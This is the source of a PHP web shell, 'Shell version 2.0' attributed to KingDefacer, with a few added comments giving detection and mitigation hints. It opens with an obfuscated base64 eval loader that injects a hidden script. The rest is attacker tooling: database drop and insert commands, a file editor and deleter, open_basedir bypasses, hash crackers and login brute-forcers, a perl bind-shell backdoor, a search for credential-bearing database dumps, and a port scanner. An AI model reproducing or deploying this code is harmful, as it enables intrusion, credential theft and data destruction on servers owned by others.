$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
// SqlInsert(): row-insert screen of the MySQL client. It reconnects with the host, port,
// user and password that extract($_SESSION) copies out of the session, i.e. database
// credentials are held in the PHP session store while the operator is logged in.
function SqlInsert() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo "
"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; for($s=0;$s
"; echo "
"; } else { $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; $values=array(); $keys=array(); $query="INSERT INTO $_GET[db].$_GET[tbl] ("; foreach($_POST as $k=>$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k"; if(@mysql_query($query)) echo "Row inserted
"; else echo "Failed to insert row
"; echo ""; } } } function SQLDrop() { echo "
"; extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_GET['droptbl'])) { $query="DROP DATABASE $_GET[dropdb]"; if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped
"; else echo "Failed to drop database $_GET[dropdb]
"; } elseif(isset($_GET['db'])&&isset($_GET['droptbl'])) { $query="DELETE FROM $_GET[db].$_GET[droptbl]"; if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped
"; else echo "Failed to drop table $_GET[droptbl]
"; } else { echo "Invalid request
"; } } else echo "Failed to connect
"; echo "
"; } function db_create() { echo "
"; if(isset($_POST['db_name']) && !empty($_POST['db_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!"; else echo "Failed to create database $_POST[db_name]
"; } else echo "Failed to connect
"; } else echo "Enter a DB name
"; echo ""; } function table_create() { echo "
"; if(isset($_POST['table_name'])&&!empty($_POST['table_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { @mysql_select_db($_POST['db_current']); if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!"; else echo "Failed to create table $_POST[table_name]"; } else echo "Failed to connect!
"; } else echo "Enter a table name
"; echo "
"; } function FileEditor() { if(isset($_GET['file'])) $file=$_GET['file']; elseif(isset($_POST['nfile'])) $file=$_POST['nfile']; elseif(isset($_POST['editfile'])) $file=$_POST['editfile']; if(@!file_exists($file)) die("Permission denied!"); if(isset($_POST['dfile'])) { @$fh=fopen($file,'r'); @$buffer=fread($fh,filesize($file)); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($buffer)); header("Content-disposition: attachment; filename=".basename($file).';'); @ob_get_clean(); echo $buffer; @fclose($fh); } elseif(isset($_POST['delfile'])) { if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!
"; else echo "File deleted
"; } elseif(isset($_POST['sfile'])) { $fh=@fopen($file,'w') or die("Failed to open file for editing!"); @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents'])); echo "File saved!"; @fclose($fh); } else { $fh=@fopen($file,'r'); echo "
File to edit:

"; echo "

"; echo "
"; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "

"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!
"; @$fh=fopen($_POST['dest'],'r'); echo "

"; @fclose($fh); } else echo "Failed to copy file
"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo ""; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]
"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "
Security (open_basedir) bypassers
Bypass using cURLBypass using tempnam()
Read file:
Write file:
Bypass using copy()Bypass using include()
Copy to:
File to copy:
Path to file:
Bypass using SQL LOAD INFILE [Login to SQL server first]
[Existing] Database to store temporary table:
Temporary table:
"; } function brute_force() { echo "

Password crackers
MD5 CrackerSHA1 Cracker
Hash: Hash:
VBulletin Salt CrackerSMF Salt cracker
Hash:
Salt:
Hash:
Salt:
MySQL Brute ForceFTP Brute Force
User:
Host:
Port:
User:
Host:
Port:
Timeout:
Remote login Brute ForceHTTP-Auth Brute Force
Login form:
Username:
Username:
Auth URL:
Wordlist


Notice: Be sure to check the max POST length allowed
"; }
/**
 * 'bh' action. Without $_POST['backdoor_host'] it prints the port form; otherwise it
 * decodes $backdoor_perl (a base64 blob defined outside this excerpt) into shbd.pl in
 * the current directory and runs it with perl through execmd(), passing $_POST[port].
 * No unlink() of shbd.pl is visible, so the file stays on disk.
 *
 * Detection: a file named shbd.pl in a web directory, perl running as a child of the
 * web-server account, and a new listening socket owned by that account.
 * Mitigation: inbound filtering that exposes only the intended service ports.
 */
function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo "
Port:
"; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd
"; } }
/**
 * Recursively lists files whose extension is .db or .sql (Thumbs.db / thumbs.db are
 * skipped) below $dir. While the current path does not yet contain /public_html/, the
 * recursion steps into each sub-directory's public_html folder.
 *
 * Defender note: database dumps left in web-reachable account directories are what
 * this search looks for; keep backups outside any path the web-server account can read.
 *
 * @param string $dir Directory to scan; the code concatenates names directly onto it.
 */
function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "
$dir"."$file
"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("/\/public_html\//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); }
// database_tools(): 'dbs' action; the 'sql_start_search' form field starts the dump search.
function database_tools() { if(isset($_POST['sql_start_search'])) { echo "
"; sql_rep_search("/home/"); echo "
Databases
"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr); } switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading"); break; } echo "Parsing database contents...
"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i"; } continue; } @fclose($fh); } echo "
Database parser
Quote delimiter (usually ` or '): Columns to retrieve (separate by commas):
Use predefined column match (user+pass+salt):
Path to DB dump:
Upload DB dump:

Find database Backups
Only search within local path:
"; } function show_tools() { echo "
Tools
Forum locatorConfig locator
Passwd file:
Passwd file:
Port scannerSearch
Host: Start port:
Start port: End Port:
Using:
Finish this next
"; }
/**
 * Formats a byte count for the file listing.
 *
 * @param int $s Size in bytes.
 * @return int|string 0 when $s is falsy; otherwise the value rounded to whole units
 *                    with a " GB", " MB", " KB" or " B" suffix (1024-based thresholds).
 */
function TrueSize($s) { if(!$s) return 0; if($s>=1073741824) return(round($s/1073741824)." GB"); elseif($s>=1048576) return(round($s/1048576)." MB"); elseif($s>=1024) return(round($s/1024)." KB"); else return($s." B"); }
/**
 * Normalises path separators: backslashes become forward slashes, then each "//" is
 * replaced by "/" in a single pass.
 * This is cosmetic only, not a security control: ".." segments are not resolved and
 * the path is not confined to any base directory.
 *
 * @param string $d Path to normalise.
 * @return string Normalised path.
 */
function CleanDir($d) { $d=str_replace("\\","/",$d); $d=str_replace("//","/",$d); return $d; }
/**
 * Drops the last two "/"-separated segments of $d and joins the rest again; the
 * directory listing uses it to build the target of its ".." entry.
 *
 * @param string $d Path such as "<dir>/..".
 * @return string Path without its final two segments.
 */
function Trail($d) { $d=explode('/',$d); array_pop($d); array_pop($d); $str=implode($d,'/'); return $str; }
// Encoder(): 'encode' action; in this copy only the input form markup is echoed.
function Encoder() { echo "
Input:
"; } $relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd())); if(isset($_GET['d'])) $self.="?d=$_GET[d]"; echo "
Execute command
Execute PHP
Create directoryCreate file
Enter directoryEdit file
Upload fileWget file
Save location:
Switch theme: Matrix Green, Uplink Blue, Dark


Shell [version 2.0] Edited By [KingDefacer] | Page generated in : ".round(microtime()-$start,2)." seconds
"; ob_end_flush(); ?>